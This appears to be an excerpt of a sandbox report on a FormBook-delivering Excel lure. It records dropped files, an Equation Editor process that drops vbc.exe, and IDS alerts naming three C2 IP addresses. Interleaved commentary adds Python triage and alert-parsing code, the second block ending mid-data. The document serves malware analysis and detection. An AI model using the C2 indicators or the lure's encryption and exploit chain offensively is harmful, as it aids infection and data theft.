                                                  MD5:C19636DBD6A1B9428BCB8758E04F5FC7
                                                  SHA1:BD5F5490EB4FDFB9A8161A6F77B6440520136473
                                                  SHA-256:C7F22E5E13D15601B865F0DE1FDAB380218CE085DAB19B0A2F28ACA4A670A88E
                                                  SHA-512:F63D1E715EEAF2F93338F40DE2EAB6550483F1FAD430ED94AF0649AE7B073E2929796D43800E9CFC086D0F0C2EC18D2A8487B19F9071EECCE3CE777B25600B36
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............=c....tEXtSoftware.Adobe ImageReadyq.e<...~iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:DocumentID="xmp.did:EDC9411A6A5F11E2838BB9184F90E845" xmpMM:InstanceID="xmp.iid:EDC941196A5F11E2838BB9184F90E845" xmp:CreatorTool="Adobe Photoshop CS2 Windows"> <xmpMM:DerivedFrom stRef:instanceID="uuid:5A79598F285EDB11B275CB8CE9AFFC64" stRef:documentID="adobe:docid:photoshop:51683bff-375b-11d9-ab90-a923e782e0b8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...F....PLTE..............
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90706C26.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                  Category:dropped
                                                  Size (bytes):4396
                                                  Entropy (8bit):7.884233298494423
                                                  Encrypted:false
                                                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                  Malicious:false
                                                  Preview: ......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B082A1EF.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):11303
                                                  Entropy (8bit):7.909402464702408
                                                  Encrypted:false
                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                  Malicious:false
                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C040A83A.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):11303
                                                  Entropy (8bit):7.909402464702408
                                                  Encrypted:false
                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                  Malicious:false
                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D37E7324.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10202
                                                  Entropy (8bit):7.870143202588524
                                                  Encrypted:false
                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB750BDD.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                  Category:dropped
                                                  Size (bytes):4396
                                                  Entropy (8bit):7.884233298494423
                                                  Encrypted:false
                                                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                  Malicious:false
                                                  Preview: ......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3F9A6F3.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10202
                                                  Entropy (8bit):7.870143202588524
                                                  Encrypted:false
                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                                  C:\Users\user\AppData\Local\Temp\~DF182ACAA3E256FB8B.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF348A23C0846DCD61.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF464E500D1B1A44AE.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF474EEA2985E340FB.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:CDFV2 Encrypted
                                                  Category:dropped
                                                  Size (bytes):317816
                                                  Entropy (8bit):7.9785869008250065
                                                  Encrypted:false
                                                  SSDEEP:6144:Tvu1GedR2fSZ3lWkAfjP7FW+Ij8+BGd/m/SvMeH6x0mdEa1f2K9doyi:j+VjUs4kWP5W+IY+BGd/m/SvMekp5Q
                                                  MD5:DA4BEFA8DFE9D56B937B01A2D2818175
                                                  SHA1:CF8E6AE0B8AFB3D3F2956FBE0C88599FB361EDE8
                                                  SHA-256:87F4B613C197B92F31D5EED4C7AD32A8BA4AE68313D56B54FF656F273FB56D86
                                                  SHA-512:421CE4922A5C05C59DC9993AC48DA9D99D990BD9A46587E2BA2116F55889EAD2378239C79154D3EF03178C49F0E6AEE1BC1ECF1E64CDAF450D5D0B2316B6E15D
                                                  Malicious:false
                                                  Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                  C:\Users\user\Desktop\~$RFQ HCI20220113.xlsx
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):165
                                                  Entropy (8bit):1.4377382811115937
                                                  Encrypted:false
                                                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                  MD5:797869BB881CFBCDAC2064F92B26E46F
                                                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                  Malicious:true
                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  C:\Users\Public\vbc.exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):417792
                                                  Entropy (8bit):7.729098788142576
                                                  Encrypted:false
                                                  SSDEEP:12288:gyK777777777777OPMfcmnxTLrXEQ0/Ll1PishiMkNMfPjJ8W:jK777777777777OKLQR1Pf+aP6W
                                                  MD5:83AC585E99B527EEB278702F8F711568
                                                  SHA1:A576A927B067C94CDBC1E7B353F60577F5B310F9
                                                  SHA-256:9E2502B3945F31482623E8E61DCB85B9EBB7D9A4244D9074FA289596C9DA513E
                                                  SHA-512:F4A5F197CCA552237CA4CA0DBDBA4AF5E5C0F6BCA7A05313A61D96C5021049EDEB0B38D8E4AD5EE3B062692038F05254787A57C5C1A0E951E9A9B9F091A304AC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H?.a.................V..........:u... ........@.. ....................................@..................................t..W.................................................................................... ............... ..H............text...@U... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B.................u......H.......|F..d.......-....]..............................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....oc...*..{....*.s..

                                                  Static File Info

                                                  General

                                                  File type:CDFV2 Encrypted
                                                  Entropy (8bit):7.9785869008250065
                                                  TrID:
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                  File name:RFQ HCI20220113.xlsx
                                                  File size:317816
                                                  MD5:da4befa8dfe9d56b937b01a2d2818175
                                                  SHA1:cf8e6ae0b8afb3d3f2956fbe0c88599fb361ede8
                                                  SHA256:87f4b613c197b92f31d5eed4c7ad32a8ba4ae68313d56b54ff656f273fb56d86
                                                  SHA512:421ce4922a5c05c59dc9993ac48da9d99d990bd9a46587e2ba2116f55889ead2378239c79154d3ef03178c49f0e6aee1bc1ecf1e64cdaf450d5d0b2316b6e15d
                                                  SSDEEP:6144:Tvu1GedR2fSZ3lWkAfjP7FW+Ij8+BGd/m/SvMeH6x0mdEa1f2K9doyi:j+VjUs4kWP5W+IY+BGd/m/SvMekp5Q
                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                  File Icon

                                                  Icon Hash:e4e2aa8aa4b4bcb4
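A file named .xlsx that identifies as "CDFV2 Encrypted" rather than as a ZIP archive is itself a finding: a plaintext .xlsx is a ZIP package, and Office wraps an encrypted one in an OLE2 compound file whose directory holds an EncryptionInfo stream (the cipher parameters) and an EncryptedPackage stream (the ciphertext of the ZIP). Until that stream is decrypted, nothing inside the workbook is visible to static scanners. The stdlib-only triage check below is an added example, not part of the report or of Joe Sandbox; the sample blobs are constructed and are not valid compound files, just enough structure to exercise the heuristic.

```python
r"""
Added example, not part of the Joe Sandbox report: a stdlib-only triage check for an
".xlsx" that identifies as "CDFV2 Encrypted". Directory entry names in an OLE2 file are
NUL-terminated UTF-16LE inside a 128-byte entry that never straddles a sector, so a raw
byte scan locates them without walking the FAT. The sample blobs are constructed.
"""
import hashlib

OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")
ZIP_MAGIC = b"PK\x03\x04"
# SHA-256 of the submitted workbook, taken from the report's Static File Info.
REPORT_SHA256 = "87f4b613c197b92f31d5eed4c7ad32a8ba4ae68313d56b54ff656f273fb56d86"


def directory_name(stream: str) -> bytes:
    """Encode a stream name as it appears in an OLE2 directory entry (UTF-16LE plus NUL)."""
    return stream.encode("utf-16-le") + b"\x00\x00"


def classify_workbook(data: bytes) -> dict:
    """Tell a plaintext OOXML package, an Office-encrypted one and a legacy BIFF file apart."""
    result = {"container": "unknown", "encrypted_ooxml": False, "streams": []}
    if data.startswith(ZIP_MAGIC):
        result["container"] = "ooxml-zip"      # plaintext .xlsx, inspectable as-is
        return result
    if not data.startswith(OLE_MAGIC):
        return result
    result["container"] = "ole2"
    for name in ("EncryptionInfo", "EncryptedPackage", "Workbook"):
        if directory_name(name) in data:
            result["streams"].append(name)
    # Both encryption streams together mean an OOXML package wrapped by Office encryption;
    # a bare "Workbook" stream is a legacy BIFF .xls, which this check does not judge.
    result["encrypted_ooxml"] = {"EncryptionInfo", "EncryptedPackage"} <= set(result["streams"])
    return result


def is_reported_sample(data: bytes) -> bool:
    """True only for the exact file the report analysed."""
    return hashlib.sha256(data).hexdigest() == REPORT_SHA256


# Constructed blobs: header magic, a padded first sector, then directory-style name bytes.
SAMPLE_ENCRYPTED = (OLE_MAGIC + b"\x00" * 504 + directory_name("EncryptionInfo")
                    + b"\x00" * 90 + directory_name("EncryptedPackage"))
SAMPLE_LEGACY_XLS = OLE_MAGIC + b"\x00" * 504 + directory_name("Workbook")
SAMPLE_PLAIN = ZIP_MAGIC + b"\x14\x00\x00\x00"

if __name__ == "__main__":
    for label, blob in (("encrypted", SAMPLE_ENCRYPTED), ("legacy", SAMPLE_LEGACY_XLS), ("plain", SAMPLE_PLAIN)):
        print(label, classify_workbook(blob), "reported sample:", is_reported_sample(blob))
```

The byte scan is a triage heuristic: the two names could also occur inside an embedded object, so confirm with a real directory listing (olefile's `OleFileIO(path).listdir()`) before drawing conclusions. Excel opens a workbook encrypted with its default password "VelvetSweatshop" without prompting, so encryption of this kind costs the attacker nothing in usability; msoffcrypto-tool with that password is the usual first attempt at recovering the package for static analysis.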

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP     Dest IP
                                                  01/13/22-20:22:49.687273  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49168        80         192.168.2.22  103.224.212.220
                                                  01/13/22-20:22:49.687273  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49168        80         192.168.2.22  103.224.212.220
                                                  01/13/22-20:22:49.687273  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49168        80         192.168.2.22  103.224.212.220
                                                  01/13/22-20:23:00.496770  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22  122.10.28.11
                                                  01/13/22-20:23:00.496770  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22  122.10.28.11
                                                  01/13/22-20:23:00.496770  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22  122.10.28.11
                                                  01/13/22-20:23:11.619415  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49172        80         192.168.2.22  192.185.98.251
                                                  01/13/22-20:23:11.619415  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49172        80         192.168.2.22  192.185.98.251
                                                  01/13/22-20:23:11.619415  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49172        80         192.168.2.22  192.185.98.251
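Three Emerging Threats signatures (SIDs 2031412, 2031449, 2031453) fire on each of three HTTP connections, so the nine alerts describe three FormBook check-ins, one per C2 host, about eleven seconds apart. The parser below is an added example, not part of the report or of the Snort rule set: it reads Snort "fast" alert lines, collapses the overlapping SIDs per connection and lists the C2 endpoints. SAMPLE_ALERTS is constructed in the fast-alert format from the values in the table above; the classification and priority fields are assumed, as the report does not show them.

```python
"""
Added example, not part of the Joe Sandbox report: parse Snort "fast" alert lines,
collapse the overlapping ET SIDs that fire on one connection, and extract the C2
endpoints. SAMPLE_ALERTS is constructed from the report's values; the classification
and priority fields are assumed.
"""
import re
from collections import OrderedDict
from typing import List, Tuple

SAMPLE_ALERTS = """\
01/13/22-20:22:49.687273  [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.22:49168 -> 103.224.212.220:80
01/13/22-20:22:49.687273  [**] [1:2031449:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.22:49168 -> 103.224.212.220:80
01/13/22-20:22:49.687273  [**] [1:2031412:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.22:49168 -> 103.224.212.220:80
01/13/22-20:23:00.496770  [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.22:49170 -> 122.10.28.11:80
01/13/22-20:23:00.496770  [**] [1:2031449:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.22:49170 -> 122.10.28.11:80
01/13/22-20:23:00.496770  [**] [1:2031412:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.22:49170 -> 122.10.28.11:80
01/13/22-20:23:11.619415  [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.22:49172 -> 192.185.98.251:80
01/13/22-20:23:11.619415  [**] [1:2031449:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.22:49172 -> 192.185.98.251:80
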